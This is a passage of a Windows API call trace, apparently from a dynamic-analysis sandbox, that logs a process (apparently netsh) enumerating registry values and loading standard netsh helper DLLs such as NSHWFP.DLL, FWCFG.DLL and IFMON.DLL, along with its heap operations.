0x2d6d00 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6ae0 | out: hHeap=0x2b0000) returned 1 [0134.329] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="nshwfp", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0134.329] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0134.329] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2d28e0 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2d2330 [0134.330] GetProcessHeap () returned 0x2b0000 [0134.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2d2350 [0134.330] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0134.330] GetProcessHeap () returned 0x2b0000 [0134.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2880 | out: hHeap=0x2b0000) returned 1 [0134.330] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef91b0000 [0135.703] GetProcAddress (hModule=0x7fef91b0000, lpProcName="InitHelperDll") returned 0x7fef921b6d0 [0135.703] InitHelperDll () returned 0x0 [0135.727] RegisterHelper () returned 0x0 [0135.727] GetProcessHeap () returned 0x2b0000 [0135.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c0) returned 0x2e0ea0 [0135.727] GetProcessHeap () returned 0x2b0000 [0135.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6d00 | out: hHeap=0x2b0000) returned 1 [0135.727] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="dhcpclient", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0135.727] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0135.727] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0135.728] GetProcessHeap () returned 0x2b0000 [0135.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x2d6d00 [0135.728] GetProcessHeap () returned 0x2b0000 [0135.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2d2370 [0135.728] GetProcessHeap () returned 0x2b0000 [0135.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2d7330 [0135.728] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0135.728] GetProcessHeap () returned 0x2b0000 [0135.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28e0 | out: hHeap=0x2b0000) returned 1 [0135.728] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef91a0000 [0138.413] GetProcAddress (hModule=0x7fef91a0000, lpProcName="InitHelperDll") returned 0x7fef91a1a40 [0138.413] InitHelperDll () returned 0x0 [0138.413] RegisterHelper () returned 0x0 [0138.413] GetProcessHeap () returned 0x2b0000 [0138.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x318) returned 0x2e5e30 [0138.413] GetProcessHeap () returned 0x2b0000 [0138.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0ea0 | out: hHeap=0x2b0000) returned 1 [0138.413] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="wshelper", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0138.413] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0138.413] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0138.413] GetProcessHeap () returned 0x2b0000 [0138.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2e0ea0 [0138.414] GetProcessHeap () returned 0x2b0000 [0138.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2e35e0 [0138.414] GetProcessHeap () returned 0x2b0000 [0138.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2e15f0 [0138.414] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0138.414] GetProcessHeap () returned 0x2b0000 [0138.414] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6d00 | out: hHeap=0x2b0000) returned 1 [0138.414] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef33e0000 [0139.536] GetProcAddress (hModule=0x7fef33e0000, lpProcName="InitHelperDll") returned 0x7fef33e1720 [0139.536] InitHelperDll () returned 0x0 [0139.543] RegisterHelper () returned 0x0 [0139.543] GetProcessHeap () returned 0x2b0000 [0139.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x370) returned 0x2e6ba0 [0139.543] GetProcessHeap () returned 0x2b0000 [0139.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5e30 | out: hHeap=0x2b0000) returned 1 [0139.543] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="nshhttp", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0139.543] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0139.543] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0139.543] GetProcessHeap () returned 0x2b0000 [0139.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf0) returned 0x2e5e30 [0139.544] GetProcessHeap () returned 0x2b0000 [0139.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2e3600 [0139.544] GetProcessHeap () returned 0x2b0000 [0139.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2e3620 [0139.544] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0139.544] GetProcessHeap () returned 0x2b0000 [0139.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0ea0 | out: hHeap=0x2b0000) returned 1 [0139.544] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fef33d0000 [0143.349] GetProcAddress (hModule=0x7fef33d0000, lpProcName="InitHelperDll") returned 0x7fef33d1c24 [0143.349] InitHelperDll () returned 0x0 [0143.349] RegisterHelper () returned 0x0 [0143.349] GetProcessHeap () returned 0x2b0000 [0143.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c8) returned 0x2e6f20 [0143.349] GetProcessHeap () returned 0x2b0000 [0143.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6ba0 | out: hHeap=0x2b0000) returned 1 [0143.350] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="fwcfg", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0143.350] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0143.350] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0143.350] GetProcessHeap () returned 0x2b0000 [0143.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x118) returned 0x2e5f30 [0143.350] GetProcessHeap () returned 0x2b0000 [0143.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2e3640 [0143.350] GetProcessHeap () returned 0x2b0000 [0143.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2e3660 [0143.350] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0143.350] GetProcessHeap () returned 0x2b0000 [0143.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5e30 | out: hHeap=0x2b0000) returned 1 [0143.350] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef33a0000 [0145.039] GetProcAddress (hModule=0x7fef33a0000, lpProcName="InitHelperDll") returned 0x7fef33a2d20 [0145.039] InitHelperDll () returned 0x0 [0145.039] RegisterHelper () returned 0x0 [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x420) returned 0x2eb2f0 [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6f20 | out: hHeap=0x2b0000) returned 1 [0145.039] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="authfwcfg", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0145.039] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0145.039] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x140) returned 0x2e6ba0 [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2e36a0 [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2e6720 [0145.039] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0145.039] GetProcessHeap () returned 0x2b0000 [0145.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5f30 | out: hHeap=0x2b0000) returned 1 [0145.039] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef3160000 [0150.372] GetProcAddress (hModule=0x7fef3160000, lpProcName="InitHelperDll") returned 0x7fef3165d20 [0150.372] InitHelperDll () returned 0x0 [0151.249] RegisterHelper () returned 0x0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x478) returned 0x2ee740 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb2f0 | out: hHeap=0x2b0000) returned 1 [0151.249] RegisterHelper () returned 0x0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4d0) returned 0x2eebc0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee740 | out: hHeap=0x2b0000) returned 1 [0151.249] RegisterHelper () returned 0x0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x528) returned 0x2ef0a0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eebc0 | out: hHeap=0x2b0000) returned 1 [0151.249] RegisterHelper () returned 0x0 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x580) returned 0x2ee740 [0151.249] GetProcessHeap () returned 0x2b0000 [0151.249] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ef0a0 | out: hHeap=0x2b0000) returned 1 [0151.249] RegisterHelper () returned 0x0 [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5d8) returned 0x2eecd0 [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee740 | out: hHeap=0x2b0000) returned 1 [0151.250] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="2", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0151.250] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0151.250] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x168) returned 0x2e7140 [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4) returned 0x2e72b0 [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2ee170 [0151.250] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0151.250] GetProcessHeap () returned 0x2b0000 [0151.250] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6ba0 | out: hHeap=0x2b0000) returned 1 [0151.250] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef3390000 [0153.626] GetProcAddress (hModule=0x7fef3390000, lpProcName="InitHelperDll") returned 0x7fef3391924 [0153.626] InitHelperDll () returned 0x0 [0153.626] RegisterHelper () returned 0x0 [0153.626] GetProcessHeap () returned 0x2b0000 [0153.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x630) returned 0x2f0ab0 [0153.627] GetProcessHeap () returned 0x2b0000 [0153.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eecd0 | out: hHeap=0x2b0000) returned 1 [0153.627] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="netiohlp", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0153.627] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0153.627] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0153.627] GetProcessHeap () returned 0x2b0000 [0153.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x190) returned 0x2eb3c0 [0153.627] GetProcessHeap () returned 0x2b0000 [0153.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee290 [0153.627] GetProcessHeap () returned 0x2b0000 [0153.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2ef970 [0153.627] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0153.627] GetProcessHeap () returned 0x2b0000 [0153.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7140 | out: hHeap=0x2b0000) returned 1 [0153.627] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3100000 [0156.907] GetProcAddress (hModule=0x7fef3100000, lpProcName="InitHelperDll") returned 0x7fef311ce30 [0156.907] InitHelperDll () returned 0x0 [0156.907] RegisterHelper () returned 0x0 [0156.907] GetProcessHeap () returned 0x2b0000 [0156.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x688) returned 0x2f10f0 [0156.907] GetProcessHeap () returned 0x2b0000 [0156.907] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0ab0 | out: hHeap=0x2b0000) returned 1 [0156.907] RegisterHelper () returned 0x0 [0156.907] GetProcessHeap () returned 0x2b0000 [0156.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e0) returned 0x2f1780 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f10f0 | out: hHeap=0x2b0000) returned 1 [0156.908] RegisterHelper () returned 0x0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x738) returned 0x2f0ab0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1780 | out: hHeap=0x2b0000) returned 1 [0156.908] RegisterHelper () returned 0x0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x790) returned 0x2f11f0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0ab0 | out: hHeap=0x2b0000) returned 1 [0156.908] RegisterHelper () returned 0x0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e8) returned 0x2f1990 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f11f0 | out: hHeap=0x2b0000) returned 1 [0156.908] RegisterHelper () returned 0x0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x840) returned 0x2f2180 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1990 | out: hHeap=0x2b0000) returned 1 [0156.908] RegisterHelper () returned 0x0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x898) returned 0x2f0ab0 [0156.908] GetProcessHeap () returned 0x2b0000 [0156.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2180 | out: hHeap=0x2b0000) returned 1 [0156.909] RegisterHelper () returned 0x0 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8f0) returned 0x2f1350 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0ab0 | out: hHeap=0x2b0000) returned 1 [0156.909] RegisterHelper () returned 0x0 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x948) returned 0x2f1c50 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1350 | out: hHeap=0x2b0000) returned 1 [0156.909] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="whhelper", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0156.909] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0156.909] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b8) returned 0x2eb560 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee2d0 [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2eead0 [0156.909] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0156.909] GetProcessHeap () returned 0x2b0000 [0156.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3c0 | out: hHeap=0x2b0000) returned 1 [0156.909] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef86c0000 [0157.862] GetProcAddress (hModule=0x7fef86c0000, lpProcName="InitHelperDll") returned 0x7fef86c210c [0157.863] InitHelperDll () returned 0x0 [0157.863] RegisterHelper () returned 0x0 [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a0) returned 0x2f25a0 [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1c50 | out: hHeap=0x2b0000) returned 1 [0157.863] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="hnetmon", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0157.863] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0157.863] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e0) returned 0x2eef40 [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2ee2f0 [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2ee310 [0157.863] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0157.863] GetProcessHeap () returned 0x2b0000 [0157.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb560 | out: hHeap=0x2b0000) returned 1 [0157.863] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef86b0000 [0159.497] GetProcAddress (hModule=0x7fef86b0000, lpProcName="InitHelperDll") returned 0x7fef86b22a4 [0159.497] InitHelperDll () returned 0x0 [0159.497] RegisterHelper () returned 0x0 [0159.497] GetProcessHeap () returned 0x2b0000 [0159.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9f8) returned 0x2f2f50 [0159.498] GetProcessHeap () returned 0x2b0000 [0159.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f25a0 | out: hHeap=0x2b0000) returned 1 [0159.498] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="rpc", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0159.498] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0159.498] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0159.498] GetProcessHeap () returned 0x2b0000 [0159.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x208) returned 0x2f3950 [0159.498] GetProcessHeap () returned 0x2b0000 [0159.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2eb6f0 [0159.498] GetProcessHeap () returned 0x2b0000 [0159.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2ee390 [0159.498] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0159.498] GetProcessHeap () returned 0x2b0000 [0159.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eef40 | out: hHeap=0x2b0000) returned 1 [0159.498] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef4d60000 [0160.821] GetProcAddress (hModule=0x7fef4d60000, lpProcName="InitHelperDll") returned 0x7fef4d62e88 [0160.822] InitHelperDll () returned 0x0 [0160.822] RegisterHelper () returned 0x0 [0160.822] GetProcessHeap () returned 0x2b0000 [0160.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa50) returned 0x2f22b0 [0160.823] GetProcessHeap () returned 0x2b0000 [0160.823] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2f50 | out: hHeap=0x2b0000) returned 1 [0160.823] RegisterHelper () returned 0x0 [0160.823] GetProcessHeap () returned 0x2b0000 [0160.823] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa8) returned 0x2f2d10 [0160.824] GetProcessHeap () returned 0x2b0000 [0160.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f22b0 | out: hHeap=0x2b0000) returned 1 [0160.826] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="dot3cfg", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0160.826] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0160.826] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0160.827] GetProcessHeap () returned 0x2b0000 [0160.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x230) returned 0x2eef40 [0160.828] GetProcessHeap () returned 0x2b0000 [0160.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2ee3b0 [0160.828] GetProcessHeap () returned 0x2b0000 [0160.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2ee3d0 [0160.828] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0160.832] GetProcessHeap () returned 0x2b0000 [0160.832] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3950 | out: hHeap=0x2b0000) returned 1 [0160.833] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef4d40000 [0163.771] GetProcAddress (hModule=0x7fef4d40000, lpProcName="InitHelperDll") returned 0x7fef4d4390c [0163.771] InitHelperDll () returned 0x0 [0163.771] RegisterHelper () returned 0x0 [0163.771] GetProcessHeap () returned 0x2b0000 [0163.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb00) returned 0x2f4fd0 [0163.772] GetProcessHeap () returned 0x2b0000 [0163.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2d10 | out: hHeap=0x2b0000) returned 1 [0163.772] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="napmontr", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0163.772] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0163.772] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0163.772] GetProcessHeap () returned 0x2b0000 [0163.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x258) returned 0x2f5ae0 [0163.772] GetProcessHeap () returned 0x2b0000 [0163.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ee470 